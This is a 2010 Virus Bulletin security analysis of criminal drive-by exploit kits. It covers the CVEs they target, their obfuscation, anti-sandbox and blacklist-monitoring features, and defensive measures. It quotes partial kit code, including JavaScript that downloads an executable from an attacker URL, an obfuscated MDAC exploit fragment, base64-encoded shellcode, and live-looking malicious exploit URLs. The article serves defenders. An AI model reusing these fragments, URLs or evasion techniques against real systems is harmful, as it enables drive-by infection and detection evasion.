2010-05-01
Abstract
After introducing a multitude of exploit frameworks used in drive-by browser-based attacks in his last article, this month Mark Davis details the functionality of frameworks, focusing on attack vectors (exploits) and counter-intelligence efforts.
Copyright © 2010 Virus Bulletin
Last month I introduced a multitude of exploit frameworks used in drive-by browser-based attacks (see VB, April 2010, p.21). Most are programmed in PHP and SQL, selling for a few hundred dollars or more in a competitive criminal market. Common exploit frameworks include Eleonore, Fragus, Neosploit, Yes! and more. The aim of this follow-up article is to detail the functionality of frameworks, focusing on attack vectors (exploits) and counter-intelligence efforts.
It should be noted that analysis of exploit frameworks is more of an art than a science. Incomplete data sets, demo kits and behavioural testing frequently fail to properly identify all the attack vectors of a given kit. Slang terms and/or misidentification of exploit vectors and files are commonly found when referencing open-source intelligence documentation for such frameworks. Additionally, the development and distribution of these threats is dynamic, with the threats constantly being upgraded and/or deployed privately, resulting in different configurations and capabilities of the same attack kit in different incidents. In other situations CVE numbers are deprecated, CLSIDs are not specific enough, and/or exploited vulnerabilities exist in potentially unwanted applications such as Zango adware.
It is difficult to properly qualify each attack vector and exploit in a lab. Every effort has been made to scan all files, analyse source code, and correlate back to exploit strings, CVEs and other attack data for each exploit framework attack vector reported on in this document. The author welcomes feedback and additional data to continue to research and report on such threats as they emerge (please contact [email protected]).
Before diving into exploits, what is your own theory about the prevalence of the various exploit vectors used in exploit frameworks? Do you believe kits contain as many exploits as possible? Or perhaps an exploit framework only includes the most recent or zero-day attack vectors? Do kits commonly beg, borrow, and steal so that most kits contain the same exploits? What are the most targeted vectors – Internet Explorer, Firefox, Adobe Reader, Flash, Java and others? The results of a large-scale aggregate review of exploit frameworks in the wild may surprise you. The following are the findings after an analysis of about two dozen exploit frameworks.
Exploit kits actually contain a wide range of diverse exploits impacting many different products. Some, such as Neosploit, include exploitation of vulnerabilities not included in other kits (Neosploit is alone in containing ‘Buffer Overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player’ (CVE-2007-5779)). In reviewing a comprehensive list of attack vectors the data shown in Table 1 emerged, showing the exploit vectors for all kits analysed in the wild to date.
| Vulnerability | CVE |
| Microsoft Internet Explorer 7 iepeers.dll Use After Free Vulnerability | CVE-2010-0806 |
| Microsoft Internet Explorer 8 Use After Free Vulnerability | CVE-2010-0249 |
| Adobe Reader 9.3 Acroform.api TIFF Image Handler Stack-Based Buffer Overflow Vulnerability | CVE-2010-0188 |
| Adobe Acrobat 9.2 newPlayer() Improper Initialization Vulnerability | CVE-2009-4324 |
| Sun Java Runtime Environment 6 Update 16 getSoundbank() Stack-Based Buffer Overflow Vulnerability | CVE-2009-3867 |
| Adobe Acrobat 9.1.3 U3D CLODProgressiveMeshContinuation Array Index Input Validation | CVE-2009-2990 |
| Mozilla Firefox 3.5 (Font Tags) Remote Buffer Overflow | CVE-2009-2477 |
| Microsoft Windows Server 2008 Service Pack 2 Telnet Server Unspecified Vulnerability | CVE-2009-1930 |
| Flash 10, Adobe Reader & Acrobat | CVE-2009-1862 |
| Adobe Reader 9.1 getAnnots() Function Buffer Overflow Vulnerability | CVE-2009-1492 |
| ActiveX Control vulnerability is MS Office Web Components | CVE-2009-1136 |
| Adobe Reader ‘Collab.getIcon()’ Stack-Based Buffer Overflow Vulnerability | CVE-2009-0927 |
| Uninitialized Memory Corruption Vulnerability | CVE-2009-0075 |
| Sun Java Runtime Environment 6 Update 10 Deserializing Calendar Objects Unspecified Vulnerability | CVE-2008-5353 |
| MS Internet Explorer XML Parsing Vulnerability | CVE-2008-4844 |
| Windows Media Encoder wmex.dll ActiveX Control | CVE-2008-3008 |
| Adobe Reader 8.1.2 ‘util.printf’ Stack-Based Buffer Overflow Vulnerability | CVE-2008-2992 |
| Microsoft Access 2003 Snapshot Viewer ActiveX Control Unspecified Vulnerability | CVE-2008-2463 |
| Aurigma ImageUploader ActiveX Control Stack-Based Buffer Overflows | CVE-2008-1490 |
| CA Multiple Products DSM ListCtrl ActiveX Control Buffer Overflow Vulnerability | CVE-2008-1472 |
| Adobe Reader 8.1.1 ‘Collab.collectEmailInfo()’ Stack-Based Buffer Overflow Vulnerability | CVE-2008-0655 |
| Yahoo! Music Jukebox YMP Datagrid ActiveX Control Stack Buffer Overflows | CVE-2008-0623 |
| Microsoft Video (DirectShow) ActiveX Control Vulnerability | CVE-2008-0015 |
| Stack-Based Buffer Overflow in AOL AOLMediaPlaybackControl | CVE-2007-6250 |
| QuickTime RTSP Response Vulnerability | CVE-2007-6166 |
| Buffer Overflow in the GomManager ActiveX Control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player | CVE-2007-5779 |
| Adobe Reader 8.1.1 JavaScript Argument-Handling Buffer-Overflow Vulnerability | CVE-2007-5659 |
| RealPlayer Stack-Based Buffer Overflow in the Database Component in MPAMedia.dll | CVE-2007-5601 |
| Opera Web Browser Invalid Pointer Remote Code Execution Vulnerability | CVE-2007-4367 |
| Yahoo! Webcam view Utilities ActiveX Control Vulnerable to Arbitrary Code Execution | CVE-2007-3147, CVE-2007-3148 |
| Zenturi ProgramChecker ActiveX Remote Buffer Overflow | CVE-2007-2987 |
| WordOCX ActiveX control in WordViewer.ocx 3.2.0.5 | CVE-2007-2496 |
| Adobe Inc. Flash Player 9.0.115.0 Flash File NULL Pointer Dereference Vulnerability | CVE-2007-0071 |
| Microsoft Windows Animated Cursor Remote Code Execution Vulnerability | CVE-2007-0038 |
| Vulnerability in Vector Markup Language Could Allow Remote Code Execution | CVE-2007-0024 |
| Buffer Overflow in Apple QuickTime 7.1.3 | CVE-2007-0015 |
| WinZip FileView ActiveX Controls CreateNewFolderFromName() Method Buffer Overflow | CVE-2006-6884 |
| Adobe Acrobat AcroPDF ActiveX Control Fails to Properly Handle Malformed Input | CVE-2006-6027 |
| AOL SuperBuddy ActiveX Control ‘LinkSBIcons()’ Code Execution Vulnerability | CVE-2006-5820 |
| Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution | CVE-2006-5745 |
| Multiple Heap-Based Buffer Overflows in AOL Nullsoft WinAmp Before 5.31 | CVE-2006-5567 |
| Vulnerability in Microsoft Data Access Components Allows Code Execution | CVE-2006-5559 |
| DirectAnimation ActiveX Controls Memory Corruption Vulnerabilities | CVE-2006-4777 |
| Vulnerability in Visual Studio 2005 Could Allow Remote Code Execution | CVE-2006-4704 |
| WebViewFolderIcon | CVE-2006-3730 |
| Mozilla Firefox JavaScript Navigator Object Remote Code Execution Vulnerability | CVE-2006-3677 |
| Vulnerability in Microsoft Management Console Could Allow Remote Code Execution | CVE-2006-3643 |
| Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability | CVE-2006-0005 |
| Microsoft Windows Server 2003 Service Pack 1 RDS.Dataspace ActiveX Control Access Control Vulnerability | CVE-2006-0003 |
| MSMicrosoft ‘msdds.dll’ COM Object Lets Remote Users Execute Arbitrary Code COM exploits – Generic Code Execution for IE ActiveX objects RDS.DataControl, WMIScriptUtils, and more | CVE-2005-2127 |
| Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution | CVE-2004-1049 |
| Integer Overflow in Apple QuickTime | CVE-2004-0431 |
| Java Bytecode Verifier | CVE-2003-0111 |
| Foxit Reader 3.0. PDF Exploit | N/A |
| SPL Amaya 11 | N/A |
| Windows Media Player 11 ActiveX launchURL() Files Download | N/A |
| DownloadAndExec() Zango Adware Exploits | N/A |
Table 1. Exploit vectors for all kits analysed in the wild to date.
Exploit frameworks tend not to share such vectors. Unlike ‘the year of the bot’ in 2004, when the source code for Phatbot, MyDoom and other high-profile malicious programs was made available in the underground and shared widely amongst threats, exploits are held very tightly by criminals in 2010. This is likely for competitive advantage. One theory behind the release of various source codes in 2004 was to defer culpability, with the thought that if someone got arrested they wouldn’t be the only one to be in possession of the source code for a powerful threat, or they could claim that a trojan uploaded it to their computer. In 2010 the very clear operating procedure for criminals is to undercut a mature market to develop goods and services for financial gain.
The most commonly exploited vulnerabilities amongst multiple kits are listed below:
Browser-based:
Uninitialized Memory Corruption Vulnerability
Mozilla Firefox 3.5 (Font Tags) Remote Buffer Overflow
Windows/Office:
Microsoft Windows Server 2003 Service Pack 1 RDS.Dataspace ActiveX Control Access Control Vulnerability
Microsoft Windows Server 2008 Service Pack 2 Telnet Server Unspecified Vulnerability
Microsoft Video (DirectShow) ActiveX Control vulnerability
Microsoft Access 2003 Snapshot Viewer ActiveX Control Unspecified Vulnerability
ActiveX Control Vulnerability in MS Office Web Components
Microsoft Windows Media Player Plug-in Buffer Overflow Vulnerability
Adobe (PDF/Flash):
Adobe Inc. Flash Player 9.0.115.0 Flash File NULL Pointer Dereference Vulnerability
Adobe Reader 8.1.1 ‘Collab.collectEmailInfo()’ Stack-Based Buffer Overflow Vulnerability
Adobe Reader ‘Collab.getIcon()’ Stack-Based Buffer Overflow Vulnerability
Adobe Reader 8.1.2 ‘util.printf’ Stack-Based Buffer Overflow Vulnerability
QuickTime:
Buffer Overflow in Apple QuickTime 7.1.3
Java:
Sun Java Runtime Environment 6 Update 10 Deserializing Calendar Objects Unspecified Vulnerability
The list of the most common vectors reveals a divergence of attack vectors. Attacks are not just focused on Adobe Reader (PDF) files but also on Flash, QuickTime, Java, Windows, Office and browser-based vectors. Diversity is one of the keys to maximizing exploitation and driving up sales of an exploit framework. Average exploitation on kits is around 20 per cent if they are current and well distributed for targeted victims.
Fragus is a popular exploit kit seen in the wild in 2009 and 2010. Figure 1 shows a small number of infections at the time of anlaysis. Of those infections, MDAC ranks at the top of the list, with PDF ranking second highest. The highest percentage of effective attacks is aolwinamp with 100% success, while MDAC has only 37.5% success. This suggests that, although MDAC is not as successful as other exploits, it is still being used against a target audience that may be using older versions of Internet Explorer and/or systems that are not fully patched or legal. Other exploits are often a backup for kit authors as they seek to attack with older scripts and then use more recent ones later. Other kits have a priority system that can easily be managed to prioritize the way exploits are launched, as seen in the Unique Pack example shown in Figure 2.
Leading exploit frameworks are rapidly upgraded to include new attack vectors. For example, the Java deserializing issue was implemented in several top kits within 30 days of it first being used by a kit in the wild. This is likely not due to it being shared amongst kit creators, but to the creators of the top kits competing with one another for market share within their industry.
The type of exploit is less of an issue than several years ago when buffer overflows were the common vector of exploitation. Vulnerabilities exploited by kits range from buffer overflows to memory corruption, design errors, input validation, boundary condition errors and more. What matters is that the vulnerability is reliable and fits well within the browser-based drive-by exploitation model. As such, exploitation has matured from purely browser-based vulnerabilities to targeting third-party applications integrated into browsers such as Adobe Reader (PDF), Java, Flash and similar tools. Neosploit is a prime example of this, implementing the ‘Aurigma ImageUploader ActiveX Control Stack-Based Buffer Overflows’ exploit to take advantage of a vulnerability related to software for Facebook, MySpace and similar social networking sites in 2008. By developing such exploits within a kit, its creators gained an exclusive edge over other kits, were able to target a specific audience of interest, and increase the exploitation success rate.
The average exploit framework exploits eight vulnerabilities. The more comprehensive frameworks are as follows: Eleonore, Fragus, YES!, Fiesta, Shamans Dream Pack, Unique Pack, Liberty and Papka Pack (these ranging from 11 to 17 exploits per kit).
One final trend is the avoidance of legacy exploit vectors. Legacy exploit vectors are commonly easily spotted by IDS/IPS solutions and are more likely to lead to detection and shutdown/blacklisting of an exploit framework domain or IP. As a result, older vulnerabilities are not used in or are retired from exploit frameworks. With that said, can you guess which vulnerability is the most common older vector used in multiple kits? Believe it or not, it’s the infamous MDAC vulnerability from 2006 (CVE-2006-0003). This is likely due to the raving success claimed by many criminals when using this vulnerability. It is likely that newer vulnerabilities considered of high value to criminals will also sustain longevity in exploit framework kits, most notably the recent Java deserialization vulnerability (CVE-2008-5353).
Criminals are professionals too and they have implemented a wide range of counter-intelligence capabilities. Specific to exploit frameworks there is now intelligence behind tracking and responding to specific IPs, performing a staged attack, implementing obfuscation, randomization and encryption, anti-sandbox features, and blacklist notifications. While this is not a comprehensive list, these are the most common counter-intelligence features seen in the wild in 2010.
Exploit frameworks always include some sort of web-based exploitation statistics. To track geographic spread, the IP addresses of infected computers are captured and correlated with a GeoIP database. The exploit framework stores this information in a database along with a country code for displaying statistics to the criminal.
Part of IP management in 2010 includes one-time IP payload management. If an IP is recognized as already having visited a site, the exploit framework may do something different with that session rather than launch exploits against the computer. In many cases a redirection to a common site like www.google.com is performed when a site is visited for the second time.
More recently exploit frameworks have begun to collect and archive historical intelligence against banned IPs. This is similar to work done via avtracker.info [1]. The concept is simple: track the IPs that regularly visit a hostile site to block security researchers and/or automated analysis of an exploit framework. Over a period of time this forces security researchers to proxy or otherwise modify the visiting IP of a computer investigating an exploit framework.
In some cases exploit frameworks may also present fake error messages. For example, Fragus presents what appears to be a 404 error page when in fact it is silently exploiting in the background, using heavily obfuscated JavaScript.
Attacks are sometimes performed only after triage of a visiting computer. It is now common for exploit frameworks to collect metrics on the OS, browser, referral (the last domain visited by the browser), whether Java is used, and more. This information is then used conditionally by some kits to stage attacks. This involves a simple hierarchy of conditional statements, such as numbering the sequence in which to launch exploits. Another way to manage this is shown in the Firepack kit index.php script where it looks for IE 6, and if found, attempts to exploit it. If IE 6 is not found, the user is directed to error.php:
if ($brow==”MSIE”)
{
if ($ver==”6”)
{
msie_stat();
include(“exp/msie.php”);
}
}
else
{
other_stat();
include ‘error.php’; exit;
//header(“location: $redir”);
}Msie.php, used in the above Firepack example, is also an excellent example of obfuscation, randomization and encryption used in an exploit framework attack. In this case msie.php begins with a payload URL and a randomization function:
function smc() {
$b = ‘<Script Language=”JavaScript”>
var url1=”http://k0d.biz/sfile.exe”;
var rndmz = Math.round(Math.random()*99999);The exploit begins several lines later where JavaScript is used to obfuscate the CLSID to avoid easy identification by IDS/IPS and anti-virus software:
function buff() {
var z_obj = document.createElement(b5+b6);
z_obj.setAttribute(“id”,”z_obj”);
z_obj.setAttribute(“classid”,a1+a2+a3+a4+a5+a6+a7+a8+a9+a0+b1+b2+b3+b4+””);
Additional JavaScript contains the variables a1, a2, etc., which decodes to CLSID BD96C556-65A3-11D0-983A-00C04FC29E36. A quick search reveals that this is the infamous MDAC exploit that is still used in kits even after four years of use in the wild, because there are still computers running IE 6 that are vulnerable to the attack.
Other obfuscation tactics may also exist in kits, such as base64. It is common to find strings in source code such as ‘echo base64_decode($h); }’, revealing such functionality. Take, for example, a VML base64-encoded string:
dmFyIGx4MD0iPCI7IHZhciBseDE9InY6ciI7IHZhciBseDI9ImVjdCI7IHZhciBseDM9Ij4iOyB2YXIgbHg0PS J2OmYiOyB2YXIgbHg1PSJpbGwgIjsgdmFyIGx4Nj0ibWV0IjsNCnZhciBseDc9ImhvIjsgdmFyIGx4OD0iJiN 4IjsgdmFyIGx4OT0iMDYiOyB2YXIgbngwPSIzNTAwIjsgdmFyIG54MT0ieDMwMDAwIjsgdmFyIG54Mj0iMCI7 IHZhciBueDM9MTsNCnZhciB4bHhsMD0iJSI7IHZhciB4bHhsMT0idSI7IHZhciB4bHhsMj0iOTA5MCI7DQp2Y XIgeGx4bDAwPSIldTQzNDMldTQzNDMldTBmZWIldTMzNWIldTY2YzkldTgwYjkldTgwMD <omitted>
A base64 decoding of this data yields the following hostile script that was embedded inside a VML exploit function for Firepack:
var lx0=”<”; var lx1=”v:r”; var lx2=”ect”; var lx3=”>”; var lx4=”v:f”; var lx5=”ill “; var lx6=”met”; var lx7=”ho”; var lx8=”&#x”; var lx9=”06”; var nx0=”3500”; var nx1=”x30000”; var nx2=”0”; var nx3=1; var xlxl0=”%”; var xlxl1=”u”; var xlxl2=”9090”; var xlxl00=”%u4343%u4343%u0feb%u335b%u66c9%u80b9%u80 <omitted>
Notice that the last variable includes a new obfuscated data set. It may also contain foreign characters. Additionally, various character set conversions may be required for translation by an analyst. While the decoding of such data is not difficult, many layers of obfuscation of different types hinder both automated and manual analysis of such scripts and this tactic does lower detection and mitigation rates.
Encryption is also becoming increasingly common in both exploit frameworks and malicious code, to subvert analysis and identification of hostile traffic. Below is a snippet of code taken from the Firepack kit related to ‘crypt.php’:
function rc4Encrypt($key, $pt) {
$s = array();
for ($i=0; $i<256; $i++) {
$s[$i] = $i;
}Development of anti-sandbox analysis capabilities is a growing trend in exploit frameworks. Initially, the most well-known sandboxes were targeted by kit developers, but in 2010 developers have also started to counter lesser-known analysis tools such as JSunPack and Wepawet, as seen in CRiMEPACK. This reveals a more in-depth understanding of the tools and tactics utilized by security experts in the field.
Some kits are capable not only of blacklisting by specific IP, but also of monitoring popular online sources such as malwaredomainlist and others and providing notification when exploit sites are blacklisted. CRiMEPACK is one of the more recent kits and one of the most robust in this area, providing automatic notifications to the users of the kit if their exploit sites populate the following sources:
Google Safe Browsing
hpHosts
Norton SafeWeb
Malc0de
Malwaredomainlist
Malwareurl
McAfee SiteAdvisor
My WebOfTrust
This type of counter-intelligence enables actors to know immediately and/or automate when changes to an exploit domain or IP may need to be made, thus maximizing fast flux or Avalanche-campaign-type strategies. While the integration of these two services (blacklisting counter-tactics utilizing fast flux/Avalanche) has not yet been fully realized in kits to date, it seems likely that it is not far away given the affiliations behind such attacks and the mutual interest of criminals to integrate such services. Such developments may significantly impact the prevalence and survivability of exploit frameworks online, greatly benefiting them while outpacing the security industry at large.
There are plenty of best practices that significantly reduce the likelihood of an attack on an enterprise or consumer computer. Obviously, aggressive patching and auditing of security policies is critical to avoid exploitation by a wide range of possible vulnerabilities. Additionally, a multi-layered defence model using anti-virus, firewall, IDS/IPS and a host of other tools and services helps to protect against drive-by threats. It’s worth nothing that patching isn’t just about Windows any longer but also the third-party applications regularly targeted in drive-by attacks, such as Adobe Reader, Flash, QuickTime and similar add-ons.
Data Execution Prevention (DEP) is one tool that helps even against unknown threats (zero-day exploits). When implemented for all programs it works very well to prevent common vectors of attack. Be cautioned, though, that when used with just Internet Explorer 7 and later, DEP is not fully effective. It has mixed results in dealing with IE-specific exploits. Additionally, DEP for Firefox, Adobe Reader and other tools typically relies on the Windows DEP settings rather than the individual program. As such, the baseline best practice is to enable DEP for all programs and exclude any tools that absolutely must be excluded (keep to a minimum). When properly configured, even computers vulnerable to attack avoid exploitation thanks to DEP blocking the action prior to exploitation.
A single notable exception exists with regard to DEP mitigation: Java. Because it runs in its own sandboxed environment, behaviourally all bets are off for DEP. In lab tests performed using Java exploits from actual kits in the wild, DEP settings did not impact such attacks. Additionally, unconfirmed third-party research on the Internet indicates that Java is not as well updated or managed as other third-party applications, such as Adobe Reader. As such, the overall risk for this vector is increased, which likely drives up exploitation numbers and further encourages criminals to focus on this vector of attack. More seriously, the recent deserialization issue that was implemented in several top kits in late 2009 and early 2010 is considered the ‘Holy Grail’ by some criminals. Not unlike the massive impact of MDAC, the deserialization issue has great potential to be one of the most sought after and most commonly used exploits going forth.
One final note on Java: codes like that of Bankpatch actually look for Java and, if found, upload a patched version of Java to ensure that financial fraud is possible no matter how online sessions are managed. The securing and aggressive auditing of Java must be at the top of all enterprise risk priorities to mitigate such risk.
On the IDS/IPS network layer it is also possible to implement multiple solutions to help mitigate exploit frameworks. For example, top exploit frameworks such as Eleonore, Liberty and others use the shorthand string ‘spl’ for ‘sploit’ in their exploit strings:
recover7777.com/expl2/pdf.php?spl=pdf_all
www.qpsk2.ru/ts/load.php?spl=mdac&h=
la-cosa-nostra.biz/helo/load.php?spl=dshow&b=ie&o=xp&i=WHBMKHp3MI3JbbOqU
mysecret-xxx.com/one/getexe.php?spl=pdf_all
Notice that ‘spl=’ is typically followed by an identification of the exploit, which is helpful both in identification and mitigation. The examples above include PDF exploits, MDAC and DirectShow. In other cases it is common for numbers to be assigned to each exploit vector, such as ‘1’, ‘2’, etc. Behavioural tests and script reviews often reveal the numbers assigned to each exploit within a kit.
While performing additional research for this article queries for ‘spl=’ for hostile domain data revealed a new exploit attack and a possible new kit called ZPack (shown above). While it appears that this may be related to an Eleonore exploit framework, further investigation is underway to better understand the ZPack attribution. This is a prime example of how understanding common URI elements (‘spl=’ query search in this example) in exploit strings is very helpful in identifying unknown exploit sources, strings and related attacks on a network.
This two-part series has introduced the exploits kits that are contributing to an explosion of such frameworks to facilitate criminal fraud operations. 2010 marks an important period of maturation in the criminal marketplace for exploit frameworks, where basic functionality and rapid adoption of exploits is now the norm. This necessitates advanced features of kits just now emerging including advanced encryption and obfuscation tactics, zero-day exploits customized in kits, the use of loaders to maximize payload distribution and affiliate operations management, and advanced security notifications and counter-tactics utilized by the users of such frameworks.
